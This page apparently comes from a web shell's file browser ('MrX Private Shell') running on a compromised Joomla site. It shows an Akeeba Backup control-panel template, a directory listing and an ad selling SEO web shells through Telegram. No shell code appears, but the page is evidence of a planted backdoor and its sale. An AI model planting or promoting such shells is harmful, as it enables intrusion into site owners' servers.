__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package akeebabackup
* @copyright Copyright (c)2006-2024 Nicholas K. Dionysopoulos / Akeeba Ltd
* @license GNU General Public License version 3, or later
*/
/** @var $this \Akeeba\Component\AkeebaBackup\Administrator\View\Controlpanel\HtmlView */
// Protect from unauthorized access
defined('_JEXEC') || die();
use Joomla\CMS\Factory;
use Joomla\CMS\Language\Text;
?>
<div class="card mb-2">
<h3 class="card-header bg-primary text-white">
<?= Text::_('COM_AKEEBABACKUP_CPANEL_HEADER_QUICKBACKUP') ?>
</h3>
<div class="card-body">
<div class="akeeba-cpanel-container d-flex flex-row flex-wrap align-items-stretch">
<?php foreach($this->quickIconProfiles as $qiProfile): ?>
<a class="akeeba-cpanel-button text-center align-self-stretch btn btn-outline-success border-0" style="width: 10em"
href="index.php?option=com_akeebabackup&view=Backup&autostart=1&profileid=<?= (int) $qiProfile->id ?>&<?= Factory::getApplication()->getFormToken() ?>=1">
<div class="bg-success text-white d-block text-center p-3 h2">
<span class="fa fa-play"></span>
</div>
<span><?= $this->escape($qiProfile->description) ?></span>
</a>
<?php endforeach ?>
</div>
</div>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 2.03 KB | 0664 |
|
| default.xml | File | 379 B | 0664 |
|
| footer.php | File | 1.07 KB | 0664 |
|
| icons_advanced.php | File | 2.11 KB | 0664 |
|
| icons_basic.php | File | 2.79 KB | 0664 |
|
| icons_includeexclude.php | File | 3.05 KB | 0664 |
|
| icons_troubleshooting.php | File | 1.51 KB | 0664 |
|
| joomla_eol.php | File | 2.25 KB | 0664 |
|
| oneclick.php | File | 1.2 KB | 0664 |
|
| profile.php | File | 1.94 KB | 0664 |
|
| sidebar_backup.php | File | 550 B | 0664 |
|
| sidebar_status.php | File | 2.66 KB | 0664 |
|
| upgrade.php | File | 1.51 KB | 0664 |
|
| warnings.php | File | 11.37 KB | 0664 |
|
| webpush.php | File | 2.76 KB | 0664 |
|